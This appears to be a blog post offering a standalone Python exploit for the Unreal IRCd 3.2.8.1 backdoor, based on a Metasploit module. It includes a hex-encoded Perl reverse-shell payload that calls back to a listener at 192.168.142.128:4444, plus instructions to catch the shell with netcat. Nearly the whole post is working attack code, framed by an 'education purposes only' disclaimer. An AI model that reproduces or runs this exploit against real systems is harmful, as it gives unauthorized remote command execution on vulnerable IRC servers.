unreal IRCD 3.2.8.1 standalone exploit based on Metasploit

*All credit go to Rapid7

This is a Unreal IRCD 3.2.8.1 backdoor command execution, written in Python, based on an exploit of Metasploit Framework

You still need msfvenom to generate the payload.

This shit is too old to cause any real damage, but still —

—Disclaimer: For education purposes only. Use it at your own risk, don’t blame me for anything.


#Open a netcat listener before running this code: nc -nlvp 4444
#Or you can use exploit/multi/handler of metasploit framework
#to listen to the reverse shell

import sys,socket
target_ip="192.168.142.129" #change this
target_port=6667 #dont change this

#payload: cmd/unix/reverse_perl
#encoder:cmd/perl
#Change this payload before running this exploit
buf =""
buf += "\x70\x65\x72\x6c\x20\x2d\x4d\x49\x4f\x20\x2d\x65\x20"
buf += "\x27\x24\x70\x3d\x66\x6f\x72\x6b\x3b\x65\x78\x69\x74"
buf += "\x2c\x69\x66\x28\x24\x70\x29\x3b\x66\x6f\x72\x65\x61"
buf += "\x63\x68\x20\x6d\x79\x20\x24\x6b\x65\x79\x28\x6b\x65"
buf += "\x79\x73\x20\x25\x45\x4e\x56\x29\x7b\x69\x66\x28\x24"
buf += "\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x7e\x2f\x28"
buf += "\x2e\x2a\x29\x2f\x29\x7b\x24\x45\x4e\x56\x7b\x24\x6b"
buf += "\x65\x79\x7d\x3d\x24\x31\x3b\x7d\x7d\x24\x63\x3d\x6e"
buf += "\x65\x77\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74"
buf += "\x3a\x3a\x49\x4e\x45\x54\x28\x50\x65\x65\x72\x41\x64"
buf += "\x64\x72\x2c\x22\x31\x39\x32\x2e\x31\x36\x38\x2e\x31"
buf += "\x34\x32\x2e\x31\x32\x38\x3a\x34\x34\x34\x34\x22\x29"
buf += "\x3b\x53\x54\x44\x49\x4e\x2d\x3e\x66\x64\x6f\x70\x65"
buf += "\x6e\x28\x24\x63\x2c\x72\x29\x3b\x24\x7e\x2d\x3e\x66"
buf += "\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x77\x29\x3b\x77"
buf += "\x68\x69\x6c\x65\x28\x3c\x3e\x29\x7b\x69\x66\x28\x24"
buf += "\x5f\x3d\x7e\x20\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x73"
buf += "\x79\x73\x74\x65\x6d\x20\x24\x31\x3b\x7d\x7d\x3b\x27"

shellcode= buf

#TCP client
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

#connect client to target
client.connect((target_ip,target_port))

#send shellcode to target
client.send("AB;"+ shellcode +"\n")
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s